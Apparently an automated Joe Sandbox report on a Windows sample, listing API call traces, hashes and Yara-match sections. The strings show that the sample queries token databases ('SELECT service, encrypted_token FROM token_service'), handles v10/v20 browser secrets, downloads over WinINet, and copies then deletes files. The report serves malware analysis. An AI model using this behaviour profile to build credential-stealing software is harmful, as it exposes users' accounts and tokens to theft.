                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                          • Part of subcall function 00414570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                          • Part of subcall function 00414570: HeapAlloc.KERNEL32(00000000), ref: 00414587
                                          • Part of subcall function 00414570: wsprintfA.USER32 ref: 004145A6
                                          • Part of subcall function 00414570: FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                        • String ID: 0aA
                                        • API String ID: 167551676-2786531170
                                        • Opcode ID: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                        • Instruction ID: 67fb29d5a8d89bc8d31ec604eacddc75011aa0e27ff4711df2ee94280de74797
                                        • Opcode Fuzzy Hash: c41430eb4feb1aa100886eeb9410b758f6c3d0d9cc64a6702e2d15a1bac7c1b5
                                        • Instruction Fuzzy Hash: EF3182BAD402086BDB10FBF0DC85EE9737DAB48704F40458EB31996081EE7897C9CB99
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0085FF50,00000000,?,00420E2C,00000000,?,00000000), ref: 00418130
                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,0085FF50,00000000,?,00420E2C,00000000,?,00000000,00000000), ref: 00418137
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00418158
                                        • __aulldiv.LIBCMT ref: 00418172
                                        • __aulldiv.LIBCMT ref: 00418180
                                        • wsprintfA.USER32 ref: 004181AC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocGlobalMemoryProcessStatuswsprintf
                                        • String ID: %d MB$@
                                        • API String ID: 2886426298-3474575989
                                        • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                        • Instruction ID: 96825d9750bf8db03c9b3ba7d6dfdbb869a7567600a83181e99cf30d3b71d0f4
                                        • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                        • Instruction Fuzzy Hash: CD210BB1E44218BBDB00DFD5CC49FAEB7B9FB45B14F104609F605BB280D77869018BA9
                                        APIs
                                          • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                          • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A51
                                          • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A68
                                          • Part of subcall function 022E4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022E4A7F
                                          • Part of subcall function 022E4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022E4AA0
                                          • Part of subcall function 022E4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022E4AB0
                                        • InternetOpenA.WININET(00420DF7,00000001,00000000,00000000,00000000), ref: 022E6376
                                        • StrCmpCA.SHLWAPI(?,0064A480), ref: 022E63AE
                                        • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 022E63F6
                                        • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 022E641A
                                        • InternetReadFile.WININET(?,?,00000400,?), ref: 022E6443
                                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 022E6471
                                        • CloseHandle.KERNEL32(?,?,00000400), ref: 022E64B0
                                        • InternetCloseHandle.WININET(?), ref: 022E64BA
                                        • InternetCloseHandle.WININET(00000000), ref: 022E64C7
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$??2@CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                        • String ID:
                                        • API String ID: 4287319946-0
                                        • Opcode ID: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                        • Instruction ID: 7c7fe568c3c3bb04c8668f924665e5d52cd48b0fdf4e0d91caa5e9dd75cfee37
                                        • Opcode Fuzzy Hash: b915265d1829dfbd27db1cb5210114f0d1e48a2f7e5b50ca4442b739670315f0
                                        • Instruction Fuzzy Hash: 005160B5960318ABDF20DFD0CC54BEE7779AF04705F4080A8B606A7184DBB46A89CF95
                                        APIs
                                        • memset.MSVCRT ref: 022F4FEE
                                          • Part of subcall function 022F9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022F9072
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F5017
                                        • lstrcat.KERNEL32(?,00421000), ref: 022F5034
                                          • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4B93
                                          • Part of subcall function 022F4B77: FindFirstFileA.KERNEL32(?,?), ref: 022F4BAA
                                        • memset.MSVCRT ref: 022F507A
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F50A3
                                        • lstrcat.KERNEL32(?,00421020), ref: 022F50C0
                                          • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FDC), ref: 022F4BD8
                                          • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,00420FE0), ref: 022F4BEE
                                          • Part of subcall function 022F4B77: FindNextFileA.KERNEL32(000000FF,?), ref: 022F4DE4
                                          • Part of subcall function 022F4B77: FindClose.KERNEL32(000000FF), ref: 022F4DF9
                                        • memset.MSVCRT ref: 022F5106
                                        • lstrcat.KERNEL32(?,00000000), ref: 022F512F
                                        • lstrcat.KERNEL32(?,00421038), ref: 022F514C
                                          • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4C17
                                          • Part of subcall function 022F4B77: StrCmpCA.SHLWAPI(?,004208D2), ref: 022F4C2C
                                          • Part of subcall function 022F4B77: wsprintfA.USER32 ref: 022F4C49
                                          • Part of subcall function 022F4B77: PathMatchSpecA.SHLWAPI(?,?), ref: 022F4C85
                                          • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,0064A524), ref: 022F4CB1
                                          • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,00420FF8), ref: 022F4CC3
                                          • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,?), ref: 022F4CD7
                                          • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,00420FFC), ref: 022F4CE9
                                          • Part of subcall function 022F4B77: lstrcat.KERNEL32(?,?), ref: 022F4CFD
                                          • Part of subcall function 022F4B77: CopyFileA.KERNEL32(?,?,00000001), ref: 022F4D13
                                          • Part of subcall function 022F4B77: DeleteFileA.KERNEL32(?), ref: 022F4D98
                                        • memset.MSVCRT ref: 022F5192
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                        • String ID:
                                        • API String ID: 4017274736-0
                                        • Opcode ID: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                        • Instruction ID: 50a4548b2ab4c15d9b3e8341d4de7ecc42de74cd4848995be7608fbb4be062fc
                                        • Opcode Fuzzy Hash: 53c49ebc4b6c987f3a25fb04f0f9e833fe86fb43a5b4eada2cc9e881564654d5
                                        • Instruction Fuzzy Hash: BD41D679A5031867CB50F7F0EC46FDD7739AB24701F8044A4B689660C4EEB857D88F92
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0064A360,00000000,?,00420E2C,00000000,?,00000000), ref: 022F8397
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022F839E
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 022F83BF
                                        • __aulldiv.LIBCMT ref: 022F83D9
                                        • __aulldiv.LIBCMT ref: 022F83E7
                                        • wsprintfA.USER32 ref: 022F8413
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                                        • String ID: @
                                        • API String ID: 2774356765-2766056989
                                        • Opcode ID: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                        • Instruction ID: 2d68da53c4ba1d969d834fcd5b3df6404f30349dff1adc3d4272adc9a355352d
                                        • Opcode Fuzzy Hash: 7e71b2cf3ab39a96845f2c5ec6281b05558ac3270fef8c112806fab1e15290c3
                                        • Instruction Fuzzy Hash: AC2138B1E54218ABDB00DFD5DC49FAEFBB9FB44B04F104619F605BB284C7B869008BA5
                                        APIs
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                          • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                          • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                          • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                          • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 00409E10: memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                        • lstrlenA.KERNEL32(00000000), ref: 0040BC9F
                                          • Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52
                                        • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BCCD
                                        • lstrlenA.KERNEL32(00000000), ref: 0040BDA5
                                        • lstrlenA.KERNEL32(00000000), ref: 0040BDB9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                        • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                        • API String ID: 1440504306-1079375795
                                        • Opcode ID: b70736c1e3f0b8ac963fd4fa76b5219f60c97199373a00f55ecd1b82eff1b364
                                        • Instruction ID: 1db97c5984eaf975dbf010622291b68d8c4d82df198c84c91f10bdfb5a5a1c79
                                        • Opcode Fuzzy Hash: b70736c1e3f0b8ac963fd4fa76b5219f60c97199373a00f55ecd1b82eff1b364
                                        • Instruction Fuzzy Hash: 8CB19671911108ABDB04FBA1DD52EEE7339AF14314F40452EF506B2091EF386E99CBBA
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess$DefaultLangUser
                                        • String ID: B
                                        • API String ID: 1494266314-2248957098
                                        • Opcode ID: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                        • Instruction ID: a53c6ee3ffce5caaac90cf9b44aa2343e9827e2133a721021c11305bfc7fe0eb
                                        • Opcode Fuzzy Hash: 06d82b50bec3daad471bac9186370b40fc7c44d51d66305ede144e8412a302ef
                                        • Instruction Fuzzy Hash: C2F03A38984209FFE3549FE0A90976C7B72FB06702F04019DF709862D0D6748A519B96
                                        APIs
                                        • memcmp.MSVCRT(?,v20,00000003), ref: 00409E2D
                                          • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          • Part of subcall function 00410A60: memset.MSVCRT ref: 00410C1C
                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                          • Part of subcall function 00410A60: lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                          • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                        • memcmp.MSVCRT(?,v10,00000003), ref: 00409EAF
                                        • memset.MSVCRT ref: 00409EE8
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 00409F41
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$lstrcpymemcmpmemset$AllocLocal
                                        • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                                        • API String ID: 1977917189-1096346117
                                        • Opcode ID: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                        • Instruction ID: cfc602575c7eb8b90e75612a825b183f0a0020e5ceb1952e76b28d7f8d83ce04
                                        • Opcode Fuzzy Hash: 191b2616e1fb3493a53b7252654be595687e3ce1a8345bb1b47cea2af286b9d8
                                        • Instruction Fuzzy Hash: C9615F30A00248EBCB24EFA5DD96FED7775AF44304F408029F90A6F1D1DB786A56CB5A
                                        APIs
                                          • Part of subcall function 022E7537: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 022E75A1
                                          • Part of subcall function 022E7537: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 022E7618
                                          • Part of subcall function 022E7537: StrStrA.SHLWAPI(00000000,004217EC,00000000), ref: 022E7674
                                          • Part of subcall function 022E7537: GetProcessHeap.KERNEL32(00000000,?), ref: 022E76B9
                                          • Part of subcall function 022E7537: HeapFree.KERNEL32(00000000), ref: 022E76C0
                                        • lstrcat.KERNEL32(0064A668,004217FC), ref: 022E786D
                                        • lstrcat.KERNEL32(0064A668,00000000), ref: 022E78AF
                                        • lstrcat.KERNEL32(0064A668,00421800), ref: 022E78C1
                                        • lstrcat.KERNEL32(0064A668,00000000), ref: 022E78F6
                                        • lstrcat.KERNEL32(0064A668,00421804), ref: 022E7907
                                        • lstrcat.KERNEL32(0064A668,00000000), ref: 022E793A
                                        • lstrcat.KERNEL32(0064A668,00421808), ref: 022E7954
                                        • task.LIBCPMTD ref: 022E7962
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                                        • String ID:
                                        • API String ID: 2677904052-0
                                        • Opcode ID: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                        • Instruction ID: 2939e9c7883b69d7bc3ff7d2ae94d0cc368a1a2341d43c68e786eb586915e3cc
                                        • Opcode Fuzzy Hash: 9128ed74142edb21baca04feacde88044c17a1dba194879cafba99f4cf808b72
                                        • Instruction Fuzzy Hash: A1314F75A50209EFDF04EBE0DC94DFEB776EB59301F505018E106672A4DA34A942DF62
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022E5231
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 022E5238
                                        • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 022E5251
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 022E5278
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 022E52A8
                                        • memcpy.MSVCRT(00000000,?,00000001), ref: 022E52F1
                                        • InternetCloseHandle.WININET(?), ref: 022E5320
                                        • InternetCloseHandle.WININET(?), ref: 022E532D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                        • String ID:
                                        • API String ID: 1008454911-0
                                        • Opcode ID: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                        • Instruction ID: a8c2018a1be64044be499e83949fdde298d2854408df4f827856bee4c968367c
                                        • Opcode Fuzzy Hash: 115837f6574749958b6ecbcaee2c688be1f676679876c6a36d0e4ab8fe972489
                                        • Instruction Fuzzy Hash: 6B3118B8A50218ABDB20CF94DC84BDCB7B5EB48704F5081D9F709A7284D7B46AC5CF98
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00404FCA
                                        • HeapAlloc.KERNEL32(00000000), ref: 00404FD1
                                        • InternetOpenA.WININET(00420DDF,00000000,00000000,00000000,00000000), ref: 00404FEA
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405011
                                        • InternetReadFile.WININET(00415EDB,?,00000400,00000000), ref: 00405041
                                        • memcpy.MSVCRT(00000000,?,00000001), ref: 0040508A
                                        • InternetCloseHandle.WININET(00415EDB), ref: 004050B9
                                        • InternetCloseHandle.WININET(?), ref: 004050C6
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1924602368.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1924602368.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1924602368.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocFileProcessReadmemcpy
                                        • String ID:
                                        • API String ID: 3894370878-0
                                        • Opcode ID: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                        • Instruction ID: cb0899809939a0b3ab7ef321ba077ef70f04c27eec1e373fde9f1e9505320bf0
                                        • Opcode Fuzzy Hash: a56c18f6a8e036f8b5130d6e607b8bed7a49f8965ae2d7d0d74e6c8ccafdc211
                                        • Instruction Fuzzy Hash: 2A3108B8A40218ABDB20CF94DC85BDDB7B5EB48704F1081E9F709B7281C7746AC58F99
                                        APIs
                                          • Part of subcall function 022FAA87: lstrlen.KERNEL32(022E516C,?,?,022E516C,00420DDE), ref: 022FAA92
                                          • Part of subcall function 022FAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022FAAEC
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                        • StrCmpCA.SHLWAPI(00000000,004210C8,00000000), ref: 022F58AB
                                        • StrCmpCA.SHLWAPI(00000000,004210D0), ref: 022F5908
                                        • StrCmpCA.SHLWAPI(00000000,004210E0), ref: 022F5ABE
                                          • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                          • Part of subcall function 022F5457: StrCmpCA.SHLWAPI(00000000,0042108C), ref: 022F548F
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                          • Part of subcall function 022F5527: StrCmpCA.SHLWAPI(00000000,0042109C,00000000), ref: 022F557F
                                          • Part of subcall function 022F5527: lstrlen.KERNEL32(00000000), ref: 022F5596
                                          • Part of subcall function 022F5527: StrStrA.SHLWAPI(00000000,00000000), ref: 022F55CB
                                          • Part of subcall function 022F5527: lstrlen.KERNEL32(00000000), ref: 022F55EA
                                          • Part of subcall function 022F5527: strtok.MSVCRT(00000000,?), ref: 022F5605
                                          • Part of subcall function 022F5527: lstrlen.KERNEL32(00000000), ref: 022F5615
                                        • StrCmpCA.SHLWAPI(00000000,004210D8,00000000), ref: 022F59F2
                                        • StrCmpCA.SHLWAPI(00000000,004210E8,00000000), ref: 022F5BA7
                                        • StrCmpCA.SHLWAPI(00000000,004210F0), ref: 022F5C73
                                        • Sleep.KERNEL32(0000EA60), ref: 022F5C82
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleepstrtok
                                        • String ID:
                                        • API String ID: 3630751533-0
                                        • Opcode ID: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                        • Instruction ID: 688620f2968f751a2717c213b2df6fcde1427aaefe87c9250c7e18e4c4253aae
                                        • Opcode Fuzzy Hash: db5533aa26391db7b09057ab882c831095ddfd6089117583eb43885adc9af707
                                        • Instruction Fuzzy Hash: 0DE11071920304AACB58FBE0DD96DEDF37AAF55700F808178A60A66198EF345B5CCF91
                                        APIs
                                        • memset.MSVCRT ref: 022E158E
                                          • Part of subcall function 022E1507: GetProcessHeap.KERNEL32(00000000,00000104), ref: 022E151B
                                          • Part of subcall function 022E1507: RtlAllocateHeap.NTDLL(00000000), ref: 022E1522
                                          • Part of subcall function 022E1507: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 022E153E
                                          • Part of subcall function 022E1507: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 022E155C
                                          • Part of subcall function 022E1507: RegCloseKey.ADVAPI32(?), ref: 022E1566
                                        • lstrcat.KERNEL32(?,00000000), ref: 022E15B6
                                        • lstrlen.KERNEL32(?), ref: 022E15C3
                                        • lstrcat.KERNEL32(?,004262E4), ref: 022E15DE
                                          • Part of subcall function 022FA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022FA9EF
                                          • Part of subcall function 022FAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FB4,00420E17), ref: 022FAC2C
                                          • Part of subcall function 022FAC17: lstrcpy.KERNEL32(00000000), ref: 022FAC6B
                                          • Part of subcall function 022FAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022FAC79
                                          • Part of subcall function 022FAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022FAB6C
                                          • Part of subcall function 022F8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022E1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FB4,00420E17), ref: 022F8DED
                                          • Part of subcall function 022FAB87: lstrcpy.KERNEL32(00000000,?), ref: 022FABD9
                                          • Part of subcall function 022FAB87: lstrcat.KERNEL32(00000000), ref: 022FABE9
                                        • CopyFileA.KERNEL32(?,00000000,00000001), ref: 022E16CC
                                          • Part of subcall function 022FAA07: lstrcpy.KERNEL32(?,00000000), ref: 022FAA4D
                                          • Part of subcall function 022E9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022E9C53
                                          • Part of subcall function 022E9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022E9C78
                                          • Part of subcall function 022E9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022E9C98
                                          • Part of subcall function 022E9C27: ReadFile.KERNEL32(000000FF,?,00000000,022E16F6,00000000), ref: 022E9CC1
                                          • Part of subcall function 022E9C27: LocalFree.KERNEL32(022E16F6), ref: 022E9CF7
                                          • Part of subcall function 022E9C27: CloseHandle.KERNEL32(000000FF), ref: 022E9D01
                                        • DeleteFileA.KERNEL32(00000000), ref: 022E1756
                                        • memset.MSVCRT ref: 022E177D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1925078973.00000000022E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022E0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_22e0000_hi2jR57Z15.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlenmemset$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                                        • String ID:
                                        • API String ID: 3885987321-0
                                        • Opcode ID: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                                        • Instruction ID: db7137ced2ed0ee4f33cf310ced12729a45174a993d47899050c33dbe3a7d03c
                                        • Opcode Fuzzy Hash: 65992f5c161543344b7d7a67b9e28a0d0697389c6807308598fc34cd9fe59a0c
                                        • Instruction Fuzzy Hash: 47516DB19603189BCB59FBA0DDA1EEDB37EAF54700F4041B8A70E62184EE345B89CF55
                                        APIs
